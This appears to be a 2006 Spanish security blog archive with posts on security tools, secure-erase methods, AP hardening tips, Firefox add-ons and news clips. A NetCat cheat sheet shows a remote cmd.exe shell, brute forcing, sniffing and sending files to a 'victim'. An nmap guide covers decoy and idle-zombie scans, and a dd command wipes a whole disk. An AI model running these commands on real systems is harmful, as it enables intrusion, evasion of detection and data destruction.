Los webmasters y propietarios de Web pueden emplear escáneres web automáticos para detectar vulnerabilidades en sus sitios. N-Stealth Free y SiteDigger son dos herramientas ideadas para este propósito.


N-Stealth Free


SiteDigger


18. Análisis de comunicaciones Bluetooth


Los aparatos bluetooth son cada vez más populares. Existen herramientas para monitorizar la actividad Bluetooth en nuestro alcance. Una de ellas es Bluesweep.


BlueSweep (requiere registro)



19. Sistema


Algunas herramientas permiten evaluar el rendimiento del sistema y monitorizar la actividad del mismo. Esto puede ser interesante igualmente a efectos de seguridad. Whatsrunning es una herramienta que proporciona este tipo de información. Otra posible recomendación es la versión Lite de Sandra, de SiSoft. Los usuarios deberían también ojear las Sysinternals Freeware.


Juan nos recuerda que anda por ahí Microsoft Shared Computer Toolkit.


Whatsrunning


SiSoft Sandra Lite


Sysinternals Freeware


Microsoft Shared Computer Toolkit.


20. Entornos de investigación



Estos entornos proporcionan al usuario (avanzado, lógicamente) herramientas de investigación. El proyecto Metasploit nació para desarrollar, probar y usar código exploit, pero puede ser empleado con fines éticos, para test de penetración e investigación de vulnerabilidades. No es una herramienta destinada al usuario en general, sino más bien al usuario avanzado.


Metasploit


Espero os sea de utilidad

Tuesday, September 12, 2006

Métodos de Borrado Seguro

Método de borrado

Definición

Nivel de seguridad

Grado 1. Super Fast Zero Write

Sobreescritura del soporte con un valor fijo (0x00) en cada tercer sector.

Bajo

Grad 2. Fast Zero Write

Sobreescritura del soporte con un valor fijo (0x00) en cada sector.

Bajo

Grado 3. Zero Write

Sobreescritura del soporte con un valor fijo (0x00) en todo el área al completo.

Bajo

Grado 4. Random Write

Sobreescritura del soporte con valores aleatorios. Su fiabilidad aumenta con el número de pasadas.

Medio

Grado 5. Random & Zero Write

Después de sobreescribir el soporte con valores aleatorios, se vuelve a sobreescribir de nuevo con un valor fijo (0x00), sobreescribe con valores aleatorios y termina con escritura de valor cero; este método es más seguro que Zero Write.

Medio

Grado 6. US Navy, NAVSO P-5239-26 – MFM

Estándar de la Armada estadounidense (US Navy) NAVSO P-5239-26 para discos codificados con MFM (Modified Frequency Modulation). El método consiste en la escritura de un valor fijo (0xffffffff) sobre el soporte, después un valor fijo (0xbfffffff), y finalmente una serie de valores aleatorios. El área de datos se lee para verificar la sobreescritura. El método suele ser aplicado sobre disquetes.

Medio

Grado 7. US Navy, NAVSO P-5239-26 – RLL

Estándar de la Armada estadounidense (US Navy) NAVSO P-5239-26 para discos codificados con RLL (Run Length Limited). Este método aplica la escritura de un valor fijo (0xffffffff) sobre el soporte grabado, un valor fijo (0x27ffffff), y finaliza con valores aleatorios. El área de datos se lee para verificar la sobreescritura. El método es aplicable a discos duros y soportes ópticos como el CD, DVD o el disco BlueRay.

Medio

Grado 8. Bit Toggle

Sobreescritura de toda la zona de datos cuatro veces, primero con el valor (0x00), sigue con el valor (0xff), luego (0x00) y finaliza con (0xff).

Medio

Grado 9. Random Random Zero

Sobreescritura del soporte dos veces con valores aleatorios, una vez más con un valor fijo (0x00). Vuelta a sobreescribir dos veces con valores aleatorios y una última vez con ceros; el método es más seguro que Random & Zero Write.

Medio

Grado 10. US Department of Defense (DoD 5220.22-M)

Este método de borrado fue introducido por el Departamento de Defensa de los EE.UU. (Pentágono) y es conocido como "DoD5220.22-M". El método consiste en la sobreescritura del soporte con un valor fijo determinado una vez (por ejemplo 0x00), seguidamente se escribe su valor complementario (0xff) una vez, y finalmente se repasa con valores aleatorios una vez. El disco se verifica para comprobar la escritura correcta de los valores.

Medio

Grado 11. US Air Force, AFSSI5020

Estándar de las Fuerzas Aéreas de los EE.UU. (US Air Force) AFSSI5020. Este método de borrado primero sobreescribe el soporte con un valor fijo (0x00), después otro valor fijo (0xff), y finalmente un valor aleatorio constante. Se comprueba al menos un 10% del disco para verificar la sobreescritura.

Medio

Grado 12. North Atlantic Treaty Organization - NATO standard

Estándar de borrado de la OTAN (North Atlantic Treaty Organization). Sobreescribe el soporte siete veces. Las primeras seis pasadas son de sobreescritura con valores fijos alternativos entre cada pasada (0x00) y (0xff). La séptima pasada sobreescribe con un valor aleatorio.

Alto

Grado 13. Peter Gutmann Secure Deletion

El método fue creado po Peter Gutmann en 1996. Probablemente sea el método de borrado de datos más seguro que existe sin combinación con otros métodos. La sobreescritura del soporte se realiza grabando valores aleatorios cuatro veces sobre cada sector. Seguidamente se sobreescribirá todo el soporte con valores pseudoaleatorios sobre cada sector durante veintisiete pasadas. Para terminar, se escribirán valores aleatorios durante cuatro pasadas sobre cada sector. En total, se realizan treinta y cinco pasadas de sobreescritura.

Alto

Grado 14. US Department of Defense (DoD 5220.22-M) + Gutmann Method

Método de alta seguridad consistente en 35 pasadas, complementables con iteraciones de Mersenne, para agilizar los procesos de borrado seguro mediante la generación de números pseudoaleatorios. Combina el Grado 13 y el 10.

Muy Alto



No está de más comentar un comando como dd. Dicho comando, aplicado en la forma, por ejemplo dd if=/dev/urandom of=/dev/hda aplica una capa extra de seguridad a la hora de formatear un disco duro (en el ejemplo copia datos aleatorios sobre todo el dispositivo /dev/hda)


Enlaces:
Darik´s Boot and Nuke -
http://dban.sourceforge.net/

East-Tec Eraser -
http://www.east-tec.com/

FrozenTech's LiveCD List -
http://www.frozentech.com/content/livecd.php

Wednesday, August 23, 2006

Usos de NetCat

Ejecutar un shell en máquina remota
nc -l -p 23 xxx.xxx.xxx.xx 23 -t -e cmd.exe

Estudiar puertos
nc -v (puedes añadir otra -v)

Bruteforce en un puerto
nc -v 79 < user.txt > log.txt
(envía user.txt y guarda la respuesta en log.txt)

Scanner de puertos en localhost (rango 1-53)
nc -v -v -z 127.0.0.1 1-53

Sniffer en pantalla
nc -v -v -L 127.0.0.1 -p 23

Sniffer en un log
nc -v -v -L -p 23 127.0.0.1 -t >login.txt

Conexiones no autorizadas en un puerto
nc -u -v -v -L -p 31337 127.0.0.1 31337

Mandar un archivo a víctima
nc -v -v -L -p 21 nombre del host -t < login.txt

Breve manual sobre uno de los clásicos, el escaneador de puertos "nmap"

Nmap es un programa para entornos Linux diseñado para escanear redes y determinar que servidores se encuentran activos y que servicios ofrecen. Nmap proporciona tambien caracteristicas avanzadas como la detección remota del sistema operativo por medio de huellas TCP/IP , escaneo tipo stealth (oculto), retraso dinámico y cálculos de retransmisión, escaneo paralelo, detección de servidores inactivos por medio de pings paralelos, escaneo con señuelos,etc. Vamos a ver algunas de las posibilidades que ofrece:

Tipos de escaneo

-sT(Escaneo TCP connect())
Se usa para establecer una conexion con todos los puertos interesantes de la máquina

-sS (Escaneo TCP SYN)
No abre una conexión TCP completa. Se envia un paquete SYN y se espera a la respuesta. Un SYN/ACK indica que el puerto está a la escucha y se envia un RST para cortar la conexión. Se necesitan privilegios de Root para construir estos paquetes

-sF -sX -sN(Modos Stealth FIN, Xmas Tree o Nul scan)
La idea es que se requie re que los puertos cerrados respondan a nuestro paquete de prueba con un RST, mientras que los puertos abiertos deben ignorar los paquetes en cuestion
El escaneo FIN utiliza un paquete FIN vacio (sorpresa) como prueba,Xmas tree
activa las flags FIN, URG y PUSH y NULL desactiva todas las flags.Si el escaneo encuentra puertos cerrados, probablemente se trate de una maquina UNIX, mientras que todos los puertos abiertos es indicativo de Windows.

-sP (Escaneo ping)
Algunos sitios web como microsoft.com pueden rechazar este tipo de paquetes

-sU (Escaneo Udp)
Este metodo se usa para saber que puertos UDP (Protocolo de Datagrama de Usuario, RFC 768) estan abiertos en un servidor.

-b (ataque de rebote ftp)
Se usa un servidor ftp que este detras de un firewall como proxy para escanear las máquinas que puedan estar detras del mismo. El formato es:nombre_de_usuario:password@servidor:puerto

Archivos interesantes de nmap

/usr/share/nmap

8 drwxr-xr-x 2 root root 4096 Feb 17 14:34 .
8 drwxr-xr-x 162 root root 4096 Feb 18 16:41 ..
12 -rw-r--r-- 1 root root 8107 Apr 21 2008 nmap.dtd
192 -rw-r--r-- 1 root root 186909 Apr 21 2008 nmap-mac-prefixes
624 -rw-r--r-- 1 root root 627864 Apr 21 2008 nmap-os-fingerprints
16 -rw-r--r-- 1 root root 8361 Apr 21 2008 nmap-protocols
20 -rw-r--r-- 1 root root 15985 Apr 21 2008 nmap-rpc
180 -rw-r--r-- 1 root root 172950 Apr 21 2008 nmap-service-probes
116 -rw-r--r-- 1 root root 106784 Apr 21 2008 nmap-services
24 -rw-r--r-- 1 root root 18978 Apr 21 2008 nmap.xsl


Opciones Generales

-p0
No intenta hacer ping a un servidor antes de escanearlo.(microsoft.com)

-PT
Usa el ping TCP para determinar que servidores estan activos. En vez de enviar paquetes de peticion de ecos ICMP y esperar una respuesta, se lanzan paquetes TCP ACK y se espera a que lleguen las respuestas.

-PS
Esta opcion usa paquetes SYN en vez de los paquetes ACK para usuarios root.

-PI
Esta opcion usa una peticion de eco ICMP. Encuentra servidores que estan activos y tambien busca direcciones de broadcast dirigidas a subredes en una red. Se trata de direcciones

-PB
Este es el tipo de ping por defecto. Usa los barridos ACK ( -PT ) e ICMP ( -PI ) en paralelo.

-O
Esta opcion activa la deteccion remota del sistema operativo por medio de la huella TCP/IP y lo compara con una base de datos de conocidas huellas TCP/IP para decidir que tipo de sistema se esta escaneando

-p
Esta opcion determina los puertos que se quieren especificar.

-i
Lee especificaciones de servidores o redes de destino a partir del archivo especificado en vez de hacerlo de la linea de comandos.

-g
Establece el numero de puerto de origen a usar en los escaneos.

-h
Ayuda sobre los comandos de nmap

--packet_trace
nmap imprime información detallada de cada paquete que envía y recibe

--version_trace
Resumen de packet_trace detallando la versión del servicio

-sI : Idle scan que se basa en numeros de secuencia predecibles para lanzar ataques a traves de equipos zombies (las impresoras jetdirect son buenas candidatas)

#nmap -p 3467 -P0 -sI IP_zombie IP_objetivo

-b : opción utilizada para realizar escaneos utilizando algunos servidores FTP como proxys o relays de escaneos. Tecnica de escaneos por rebote

-D : opción decoy para camuflar dentro de un rango de direcciones la IP de origen del escaneo

#nmap -P0 -D IP_decoy IP_objetivo

-L : opción que permite listar y resolver Ips sin escanear

#nmap -sL 192.168.2.1-120

EJEMPLOS

#nmap -v objetivo.ejemplo.com

Escanear todos los puertos TCP reservados de una maquina

#nmap -v -p 80 '*.*.2.3-5'

Encontrar servidores web en maquinas cuyas direcciones IP terminen en .2.3, .2.4

#nmap -v -sS -O www.miweb.net 192.168.2.0/24 '192.88-90.*.*'

Escanea con SYNs detectando el sistema operativo destino en diferentes hosts

#nmap -p 443 -O -sV 192.168.2.1

Escanea el puerto 443 del host intentando adivinar las aplicaciones que se ejecutan

#nmap -sU -A -T Insane 192.168.2.1

Escanea con UDP y -A=( -sV y -O) de forma agresiva presentando resultados rápidos

#nmap -T Insane -n -O -sS 192.168.2.*

Escanea toda la red con SYNs de forma agresiva y detectando sistemas operativos

#nmap -oA nmaplog 192.168.2.1

Escanea y escribe logs de diferentes tipos al archivo nmaplog

#nmap -p 3389 -P0 -sF 192.168.2.1 FIN SCAN

Escanea con FIN scan sin ping el puerto 3389. Más silencioso para los FWs/IDSs

Cuando un puerto está cerrado habitualmente el host responde con un RESET , cuando está abierto o filtrado no envía nada por lo que se puede obtener un listado de puertos decente si esto lo combinamos con la opción -sV que nos dice el tipo de servicio que está escuchando

#nmap -p 3389 -P0 -sX 192.168.2.1 XMAS SCAN

Similar al FIN scan pero activa los flags URG y PUSH

#nmap -p 3389 -P0 -sN 192.168.2.1 NULL SCAN

No activa flags de los paquetes

#nmap -P0 --packet_trace 192.168.2.1

Escanea con trazas detalladas

Thursday, August 10, 2006

10 pasos para blindar APs

1.Usar WPA-PSK[1] con tkip[2] (AES[3] tira demasiado de CPU en los aps baratos)
2.Establecer una laaaaaarga contraseña WPA-PSK[4]
3.Baja la potencia de transmisión, algunos firmwares cómo sveasoft[5] para linksys te dan esa posibilidad, si no es el caso, orienta las antenas hacia el suelo, mételo en un armario, o pinta la habitación[6]
4.Si utilizas tarjetas 802.11g, selecciona ese modo en el AP, (no el híbrido b/g),
así aumentarás el rendimiento y alejarás a las wifi-suckers que están haciendo wardriving
con sus tarjetas con chipset Prism. Además, algunos ataques DOS[7] no son practicables en modo g nativo con tarjetas b, algo parecido en Draft 1.0 IEEE 802.11n[8], selecciona el modo "turbo/N/buzzword" para únicamente permitir la conexión a tus dispositivos
5.Habilita el HTTPS en el router y usa exclusivamente ese método para conectarte a él, así por lo menos, los sniffer de aire no te leerán las pass en texto plano, si ya, con un MITM [9] te la pueden leer igual, pero mejor poco que nada :)
6.El filtrado MAC es muy fácil de saltar y un coñazo de mantener, más si tienes varios APs y muchxs colegas...
7.Si puedes segmentar la red, háztelo ahí, así tu tráfico "cableado" nunca saldrá al aire.
8.Activa el modo de aislamiento(se llama PSPF en cisco, en linksys se llama Wireless Cliente isolation mode, y cada fabricante le llama de una manera...) con lo que evitas la comunicación entre clientes en la capa 2..tendrás que inhabilitarlo si quieres imprimir, conectar a otro cliente...
9.Cambia la MAC de tu AP, si el firmware te lo permite, clona la MAC WAN[10], o simplemente identifícalo con una MAC de otro fabricante
10.Desactiva TODO lo que no estés usando en el AP (UpnP, STP, etc), si tienes un servidor montado, tunela con OpenVPN[11]

[1].-http://www.ubuntu-es.org/node/12416
[2].-http://en.wikipedia.org/wiki/TKIP
[3].-http://es.wikipedia.org/wiki/AES
[4].-http://www.kurtm.net/wpa-pskgen/
[5].-http://barrapunto.com/article.pl?sid=05/01/16/1646228&mode=thread
[6].-http://www.forcefieldwireless.com/products.html
[7].-http://en.wikipedia.org/wiki/Denial-of-service_attack
[8].-http://www.camyna.com/wordpress/?p=1151
[9].-http://en.wikipedia.org/wiki/MITM
[10].-http://docs.sveasoft.com/SV-WRT54GHardware.html
[11].-http://openvpn.net/

Algo de Wifi

Network Simulator tiene un wiki nuevo..
Las Pruebas de concepto de Raw Wireless están muy interesantes
Hasta el 20 de agosto se está desplegando el Wireless Comunity Camp...muy interesante
Esta distro promete, pero sólo para Atheros :(
En este link está las compatibilidades con aircrack-ng

Friday, August 04, 2006

Herramientas de diseño de redes

Open Source
Nagios
OpenNMS,
son, en mi opinión, muy rudimentarias
knetmap
Es perfecta, problema que sólo es para KDE, y Linux, of course

Comercial
SmartDraw™
Visio
netViz™
Neon LANsurveyor

Conclusión
Si lo que quieres es que el torpe de tu jefe se entere de lo que hay,
habla con San Antonio (aka Patrón de los imposibles)
y si comunica, con SmartDraw&trade y Visio vas que te matas.

Si quieres tener medianamente documentada tu red:
netViz&trade y LANSurveyor.

Saturday, July 29, 2006

Wednesday, July 26, 2006

Pen Test

Este documento (pdf, inglés, 500 KB, 28 páginas) presenta un esquema bastante completo de los pasos a seguir para completar un test de penetración en un determinado sitio web, desde la información extraíble mediante una simple visita y el uso de herramientas online (Google, Whois y otras), hasta la utilización de aquellas herramientas específicas que permiten obtener resultados concretos.



Un buen artículo

Guía de implantación de sistemas de gestión de la seguridad de la
información.

FOROSEC es un proyecto subvencionado por el Ministerio de Industria,
Turismo y Comercio que tiene como objetivo establecer una red experta
en seguridad informática enfocada a mejorar la competitividad de las
PYMES en los servicios de negocio electrónico.
Los organizadores del proyecto son cuatro centros especializados en
TICs y seguridad informática:
* AIMME (Instituto Tecnológico Metalmecánico),
* ESI (European Software Institute),
* IAT (Instituto Andaluz de Tecnología) y
* ROBOTIKER.

Esta guía está redactada en un lenguaje sencillo y puede ser un
material muy interesante para realizar una primera aproximación al
mundo de los sistemas de gestión de la seguridad de la información
(SGSI). En el documento vienen desmenuzadas las diferentes fases del
proceso, los documentos mínimos a generar y cuales deben ser los
principios y objetivos de abordar un proyecto de semejante
transcendencia e importancia para la organización. El desarrollo de la
metodología para la implementación acercará a las personas con
interés en el tema a cada una de las actividades a desarrollar dentro
del diseño y construcción del SGSI.
Por último destacar también el anexo 2 en donde se establecen unas
pautas y consejos para la elaboración de procedimientos de seguridad.

El documento puede ser descargado en el enlace
http://www.forosec.com/documentos/Guia_de_Implantacion_de_SGSI.pdf

Saturday, July 22, 2006

Addons interesantes

Mozilla

firebug https://addons.mozilla.org/firefox/1843/
pasar a minusculas: https://addons.mozilla.org/firefox/2516/

Firefox

Adblock:Adblock es un eficaz filtro anti-publicidad para los navegadores Mozilla y Mozilla Firefox, que mejora ostensiblemente la fiabilidad y robustez del filtro integrado en esos navegadores.
https://addons.mozilla.org/firefox/10/

Autocopy:Con esta extensión cualquier texto que seleccionemos dentro del navegador se pasará automáticamente al portapapeles pudiéndolo pegar luego donde sea
http://downloads.mozdev.org/autocopy/autocopy-v0.5.4.xpi

BackupFox:podrás crear una copia de seguridad de ambos perfiles de forma completa, es decir, no sólo las extensiones o los Favoritos de Internet. Si lo deseas, puedes excluir la memoria caché del navegador.
http://mhtools.knoware.nl/raptor/backupfox/backupfox073.zip

BBCodeXtra:Añade comandos BBCode/HTML/XHTML al menú contextual con los que podrás insertar las etiquetas (HTML,BBCode,....) que quieras en cualquier cuadro de texto de una página web como por ejemplo en los cuadros de texto de respuesta de cualquier foro
https://addons.mozilla.org/firefox/491/

Bugmenot:extensión que se conecta al conocido servicio BugMeNot y te logea fácilmente en los sitios que requiere de registro previo. (Muy útil)
http://roachfiend.com/archives/2005/02/07/bugmenot/

Chatzilla:ChatZilla es una extensión un tanto particular para el navegador web Mozilla Firefox. Con ella podrás conectarte a tus redes y canales favoritos de IRC, de una forma sencilla y desde el propio navegador.
https://addons.mozilla.org/firefox/16/

Colorful Tabs:Te pone cada pestañita de un color
https://addons.mozilla.org/firefox/1368/

Cutemenus: añade pequeñas imágenes en las opciones que aparecen al pulsar con el botón derecho del ratón en las páginas; también añade las imágenes a los menús de "Archivo, Editar..."
https://addons.mozilla.org/firefox/1330/

del.icio.us:te permite gestionar tu cuenta de del.icio-us, un sistema de Favoritos de Internet online.
https://addons.mozilla.org/firefox/2354/

Disable Target For Downloads:Impide que FF abra una ventana vacía al iniciar una descarga
https://addons.mozilla.org/firefox/241/

download statusbar:podrás seguir disfrutando de toda la funcionalidad del gestor de descargas de Firefox desde la barra de estado del navegador.
https://addons.mozilla.org/firefox/26/

Downthemall:te permite controlar al detalle todas las descargas que realices desde un sitio web
https://addons.mozilla.org/firefox/201/

fasterfox:Esta extensión para Firefox permite acelerar el rendimiento de este excelente navegador rápidamente y de forma muy sencilla, ya que para lograrlo basta con elegir entre las diferentes configuraciones que ofrece.
https://addons.mozilla.org/firefox/1269/

Favicon Picker:Esta extensión añade una opción para reemplazar los iconos de los marcadores.
http://personal.telefonica.terra.es/extension/faviconpicker/faviconpicker-0.2.5-es-ES.xpi

fireFTP:te permite tener integrado un cliente de FTP en el propio navegador
https://addons.mozilla.org/firefox/684/

Firetune:te permite ajustar algunas opciones ocultas del navegador Mozilla Firefox, con la finalidad de optimizar su rendimiento y acelerar la carga de páginas web y la navegación en la medida de lo posible.
http://www.majorgeeks.com/download4534.html

flashgot:podrás integrar tu gestor de descargas de toda la vida en tu navegador
https://addons.mozilla.org/firefox/220/

FLST:Devuelve el foco (se posiciona) en la pestaña anterior en que estuvimos al cerrar la pestaña activa.
https://addons.mozilla.org/firefox/32/

Footiefox:FootieFox es una extensión para Firefox especialmente pensada para los más futboleros que quieran estar informados de los goles de su equipo favorito, selección nacional o incluso de otras ligas
https://addons.mozilla.org/firefox/725/

Forescastfox:obten predicciones del tiempo de cualquier parte del mundo y las muestra en la barra de estado , altamente personalizable https://addons.mozilla.org/firefox/398/

Foxytunes:te permite controlar la reproducción de música desde la ventana del propio navegador, haciendo uso de una serie de botones que se instalan en la parte inferior de la misma.
https://addons.mozilla.org/firefox/219/

gmail notifier:puedes controlar la llegada de nuevos mensajes a tu cuenta Gmail, configurándolo para que lo compruebe cada cierto tiempo y avisándote con una pequeña ventanita en caso de que tengas nuevos mensajes.
https://addons.mozilla.org/firefox/173/

googlePreview:te permite previsualizar una imagen de los resultados obtenidos en tus búsquedas en Internet, agilizando el proceso de encontrar exactamente aquello que buscas.
https://addons.mozilla.org/firefox/189/

IE tab:Permite ver paginas con el motor de internet explorer dentro del navegador, sirve para ver las paginas que solo se pueden abrir con el IE
https://addons.mozilla.org/firefox/1419/

LiveBookmarkThis:Ofrece una opción "Añadir marcador vivo" al hacer click-derecho en enlaces.Muy útil con aquellas páginas donde el agregador RSS de firefox no funcione pero si dispongan de un enlace.
https://addons.mozilla.org/firefox/274/

Minimize to Tray:Permite ocultar las ventanas de los productos Mozilla (Firefox/Thunderbird/Seamonkey) en un icono en la bandeja del sistema al minimizarlas.
https://addons.mozilla.org/firefox/2110/

NOSCRIPT:NoScript Extensión ofrece una protección extra para tu navegador Firefox, brindándote la posibilidad de bloquear los scripts y plug-ins que no sean de tu confianza
https://addons.mozilla.org/firefox/722/

Plain Text to Link:Permite abrir direcciones que no vienen representadas como enlaces seleccionándolas y haciendo click con el segundo botón del ratón.
https://addons.mozilla.org/firefox/623/

ScrapBook:funciona a modo de cajón de sastre, guardando en su interior todo tipo de anotaciones, fragmentos copiados de páginas web, direcciones URL e incluso copias de páginas web completas.
https://addons.mozilla.org/firefox/427/

Tabbrowser Extensiones:añade numerosas y prácticas funciones al uso de las tabs
http://piro.sakura.ne.jp/xul/tabextensions/index.html.en#download

VideoDownloader:Esta extensión de Firefox te permite descargar directamente a tu PC los vídeos que puedes visualizar en diversas páginas web, tan populares como Google Video o Youtube.
https://addons.mozilla.org/firefox/2390/

wizz RSS:lector de canales RSS que se integra como una barra de herramientas extra en la interfaz de Firefox y te permite acceder a una larga lista de canales RSS
https://addons.mozilla.org/firefox/424/

Saturday, July 15, 2006

Recortes

Seven keys for complete message security

It isn't enough to protect data at rest, says the chief security officer of a global financial organization.


http://cwflyris.computerworld.com/t/675223/8277815/25990/0/


Is world domination good for security?

CJ Kelly: I was just musing to myself that I am really on a rant about Microsoft's tactics lately. I mentioned to one of my colleagues that I should lighten up because good ol' Bill is one of the world's biggest philanthropists. And my dear friend replied...

To view the rest of the blog post, click the following link.
http://cwflyris.computerworld.com/t/675223/8277815/25792/0/


El 55% de los ataques de phishing proviene de EE.UU.
Fuente: http://laflecha.net/canales/seguridad/200607141/

El 55 por ciento de los ataques de "phishing", técnica consistente en la suplantación de las páginas web de las entidades financieras para captar información confidencial de los usuarios, proceden de los Estados Unidos, según un estudio de la empresa de seguridad informática RSA.